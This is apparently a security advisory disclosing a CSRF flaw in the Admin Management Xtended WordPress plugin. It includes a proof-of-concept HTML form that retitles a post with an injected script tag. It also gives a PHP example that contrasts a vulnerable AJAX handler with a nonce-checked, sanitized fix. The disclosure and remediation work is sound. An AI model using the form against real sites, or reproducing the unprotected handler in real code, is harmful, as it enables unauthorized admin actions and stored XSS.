The Admin Management Xtended plugin suffers from a CSRF vulnerability.
The plugin does not implement any security checks (such as nonce
verification) to prevent CSRF attacks on any of its registered AJAX
actions. This allows a malicious site to trick a user who is logged in
to the affected website with administrative rights into performing these
actions with attacker-controlled data.
These actions include:
- Change post/page title
- Change post/page slug
- Toggle comment status (open/closed) for specific posts/pages
- Change media description
- Change post/page/link visibility
Many more actions are vulnerable to this attack. The ones listed in this
report alone could easily lead to a series of different types of attack,
such as persistent XSS and sensitive data exposure.
The following form performs a POST request to the vulnerable website and
updates the title of the post with ID 1, injecting JavaScript code into
the title. For this to work, a user who is logged in to the target site
with administrative rights must submit the form; the browser attaches the
victim's session cookies to the cross-site request automatically, and
the plugin has no way to tell that the request did not originate from
its own admin page.
<h1>Admin Management Xtended - CSRF</h1>
<p>
  The form is misleading and actually performs a request to update a
  specific post title. The new title will have injected JS code just to
  demonstrate how this issue could lead to an XSS attack.
</p>
<form method="post" action="http://wp1.dev/wp-admin/admin-ajax.php">
  <input type="hidden" name="action" value="ame_save_title">
  <!-- This field actually carries the post id -->
  <input type="hidden" name="category_id" value="1">
  <input type="hidden" name="new_title" value="Old Title<script>alert('XSS')</script>">
  <button type="submit" value="Push Me">Push Me</button>
</form>
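The root cause described above is an admin-ajax.php handler that acts on
whatever POST data arrives, with nothing tying the request to the
plugin's own admin page. The following PHP is an added illustration and
is not the plugin's code: it shows the vulnerable handler pattern next to
a hardened version that verifies a WordPress nonce, checks the caller's
capability for the targeted post, and sanitizes the title before saving.
The request parameter names (action=ame_save_title, category_id,
new_title) are taken from the proof-of-concept form; the function names,
the second action name ame_save_title_safe, the nonce action string and
the script handle are assumptions made for the example.

```php
<?php
// Added example, not code from the Admin Management Xtended plugin.
// Handler names, the ame_save_title_safe action and the nonce action
// string are assumptions; the POST field names come from the PoC form.

// --- Vulnerable pattern ---------------------------------------------
// No nonce, no capability check: any request that reaches admin-ajax.php
// with the victim's session cookie attached is honoured, which is exactly
// what a cross-site form submission delivers.
add_action('wp_ajax_ame_save_title', 'ame_save_title_vulnerable');
function ame_save_title_vulnerable() {
    $post_id = (int) $_POST['category_id'];           // "category_id" is really the post id
    wp_update_post(array(
        'ID'         => $post_id,
        'post_title' => $_POST['new_title'],          // stored as-is
    ));
    wp_die();
}

// --- Hardened pattern -------------------------------------------------
add_action('wp_ajax_ame_save_title_safe', 'ame_save_title_hardened');
function ame_save_title_hardened() {
    // 1. CSRF: the request must carry a nonce minted for this action and
    //    this user. A cross-site form cannot know it, so the check fails
    //    and check_ajax_referer() terminates the request.
    check_ajax_referer('ame_save_title', '_ajax_nonce');

    // 2. Authorization: the caller must be allowed to edit this specific
    //    post, not merely be logged in.
    $post_id = isset($_POST['category_id']) ? absint($_POST['category_id']) : 0;
    if (!$post_id || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error('forbidden', 403);
    }

    // 3. Input handling: strip slashes WordPress adds, then sanitize so a
    //    title cannot carry <script> into the stored post.
    $title = sanitize_text_field(wp_unslash($_POST['new_title'] ?? ''));
    if ($title === '') {
        wp_send_json_error('empty title', 400);
    }

    $result = wp_update_post(array(
        'ID'         => $post_id,
        'post_title' => $title,
    ), true);
    if (is_wp_error($result)) {
        wp_send_json_error($result->get_error_message(), 400);
    }
    wp_send_json_success(array('id' => $post_id, 'title' => $title));
}

// The legitimate admin page obtains the nonce server-side and passes it
// along with every AJAX call (as the _ajax_nonce field).
add_action('admin_enqueue_scripts', function () {
    wp_enqueue_script('ame-admin', plugins_url('ame.js', __FILE__), array('jquery'), '1.0', true);
    wp_localize_script('ame-admin', 'ameAjax', array(
        'url'   => admin_url('admin-ajax.php'),
        'nonce' => wp_create_nonce('ame_save_title'),
    ));
});
```

With the hardened handler in place, the proof-of-concept form above fails
at the nonce check before any post data is touched, and even a request
that somehow carried a valid nonce would still be limited to posts the
victim may edit and to a sanitized title. Both handlers are registered
under different action names here only so the two can coexist in one
file; a real fix replaces the vulnerable one.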